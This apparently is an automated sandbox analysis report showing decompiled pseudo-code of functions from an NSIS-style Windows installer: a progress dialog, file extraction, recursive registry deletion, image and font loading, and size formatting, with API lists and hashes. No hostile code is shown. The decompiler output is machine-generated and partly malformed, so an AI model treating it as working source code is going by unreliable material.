                                                          Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x8d79e
					_t11 =  *0x42944c;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                          0x00402dc7
                                                          0x00402dd5
                                                          0x00402ddb
                                                          0x00402ddb
                                                          0x00402de9
                                                          0x00402deb
                                                          0x00402df1
                                                          0x00402df8
                                                          0x00402dfa
                                                          0x00402dfa
                                                          0x00402e10
                                                          0x00402e20
                                                          0x00402e32
                                                          0x00402e32
                                                          0x00402e3a

                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                          • MulDiv.KERNEL32(0008D79E,00000064,?), ref: 00402E00
                                                          • wsprintfA.USER32 ref: 00402E10
                                                          • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                          • SetDlgItemTextA.USER32 ref: 00402E32
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                          • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E004027DF(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AFC(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C6B(_t50);
				_t26 = E00405C90(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403300(_t45);
						E004032EA(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                          0x004027df
                                                          0x004027e1
                                                          0x004027ed
                                                          0x004027f0
                                                          0x004027fa
                                                          0x004027fe
                                                          0x004027fe
                                                          0x00402804
                                                          0x00402811
                                                          0x00402819
                                                          0x0040281c
                                                          0x00402822
                                                          0x00402830
                                                          0x00402835
                                                          0x00402839
                                                          0x0040283c
                                                          0x00402845
                                                          0x00402851
                                                          0x00402855
                                                          0x00402858
                                                          0x00402862
                                                          0x00402887
                                                          0x00402869
                                                          0x0040286e
                                                          0x00402876
                                                          0x0040287c
                                                          0x00402881
                                                          0x00402881
                                                          0x0040288e
                                                          0x0040288e
                                                          0x0040289b
                                                          0x004028a1
                                                          0x004028b3
                                                          0x004028b3
                                                          0x004028b9
                                                          0x004028b9
                                                          0x004028c4
                                                          0x004028c5
                                                          0x004028c9
                                                          0x004028cd
                                                          0x004028d3
                                                          0x004028d3
                                                          0x004028da
                                                          0x004022dd
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                          • GlobalFree.KERNEL32 ref: 0040288E
                                                          • GlobalFree.KERNEL32 ref: 004028A1
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                          • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 48%
                                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406500(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                          0x00402cdb
                                                          0x00402ce4
                                                          0x00402ced
                                                          0x00402cf9
                                                          0x00402d02
                                                          0x00402d0c
                                                          0x00402d31
                                                          0x00402d37
                                                          0x00402d3c
                                                          0x00402d3d
                                                          0x00402d6d
                                                          0x00402d46
                                                          0x00402d48
                                                          0x00402d98
                                                          0x00402d9b
                                                          0x00000000
                                                          0x00402da1
                                                          0x00402d57
                                                          0x00402d5c
                                                          0x00402d5e
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d66
                                                          0x00402d6b
                                                          0x00402d6c
                                                          0x00402d6c
                                                          0x00402d79
                                                          0x00402d81
                                                          0x00402d88
                                                          0x00000000
                                                          0x00402db1
                                                          0x00000000
                                                          0x00402d90
                                                          0x00402d1c
                                                          0x00402d2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d2f
                                                          0x00402db7

                                                          APIs
                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                          • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                          0x00401d65
                                                          0x00401d69
                                                          0x00401d7e
                                                          0x00401d6b
                                                          0x00401d6d
                                                          0x00401d73
                                                          0x00401d73
                                                          0x00401d84
                                                          0x00401d87
                                                          0x00401d91
                                                          0x00401d94
                                                          0x00401d9c
                                                          0x00401dad
                                                          0x00401db0
                                                          0x00401dbb
                                                          0x00401db2
                                                          0x00401db4
                                                          0x00401db4
                                                          0x00401dbf
                                                          0x00401dcc
                                                          0x00401df3
                                                          0x00401e02
                                                          0x00401e10
                                                          0x00401e18
                                                          0x00401e20
                                                          0x00401e20
                                                          0x00401e29
                                                          0x00401e2f
                                                          0x004029a5
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                          • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E00406055();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                          0x00401e35
                                                          0x00401e40
                                                          0x00401e42
                                                          0x00401e4f
                                                          0x00401e66
                                                          0x00401e6b
                                                          0x00401e78
                                                          0x00401e7d
                                                          0x00401e81
                                                          0x00401e8c
                                                          0x00401e93
                                                          0x00401ea5
                                                          0x00401eab
                                                          0x00401eb0
                                                          0x00401eba
                                                          0x00402620
                                                          0x00401569
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E38
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                          • ReleaseDC.USER32 ref: 00401E6B
                                                          • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                          • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                          • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                          • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                          0x00401c2e
                                                          0x00401c30
                                                          0x00401c37
                                                          0x00401c3a
                                                          0x00401c3d
                                                          0x00401c47
                                                          0x00401c4b
                                                          0x00401c4e
                                                          0x00401c57
                                                          0x00401c57
                                                          0x00401c5a
                                                          0x00401c5e
                                                          0x00401c67
                                                          0x00401c67
                                                          0x00401c6a
                                                          0x00401c6e
                                                          0x00401c70
                                                          0x00401cc5
                                                          0x00401cc7
                                                          0x00401cd0
                                                          0x00401cd8
                                                          0x00401cdb
                                                          0x00401cdb
                                                          0x00401ce4
                                                          0x00000000
                                                          0x00401c72
                                                          0x00401c79
                                                          0x00401c7b
                                                          0x00401c7e
                                                          0x00401c84
                                                          0x00401c8b
                                                          0x00401c8e
                                                          0x00401cb6
                                                          0x00401cea
                                                          0x00401cea
                                                          0x00401c90
                                                          0x00401c9e
                                                          0x00401ca6
                                                          0x00401ca9
                                                          0x00401ca9
                                                          0x00401c8e
                                                          0x00401ced
                                                          0x00401cf0
                                                          0x00401cf6
                                                          0x004029a5
                                                          0x004029a5
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                          • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                          • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                          • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004049C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}



















                                                          0x004049ca
                                                          0x004049cf
                                                          0x004049d7
                                                          0x004049d8
                                                          0x004049e5
                                                          0x004049ed
                                                          0x004049ee
                                                          0x004049f0
                                                          0x004049f2
                                                          0x004049f4
                                                          0x004049f7
                                                          0x004049f7
                                                          0x004049fe
                                                          0x00404a04
                                                          0x00404a04
                                                          0x00404a0b
                                                          0x00404a12
                                                          0x00404a15
                                                          0x00404a18
                                                          0x00404a18
                                                          0x00404a1c
                                                          0x00404a2c
                                                          0x00404a2e
                                                          0x00404a31
                                                          0x004049da
                                                          0x004049da
                                                          0x004049e1
                                                          0x004049e1
                                                          0x00404a39
                                                          0x00404a44
                                                          0x00404a5a
                                                          0x00404a6a
                                                          0x00404a86

                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                          • wsprintfA.USER32 ref: 00404A6A
                                                          • SetDlgItemTextA.USER32 ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                          • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                          • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                                                          • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405A8F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405A8F(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                          0x00405a90
                                                          0x00405aa7
                                                          0x00405aaf
                                                          0x00405aaf
                                                          0x00405ab7

                                                          APIs
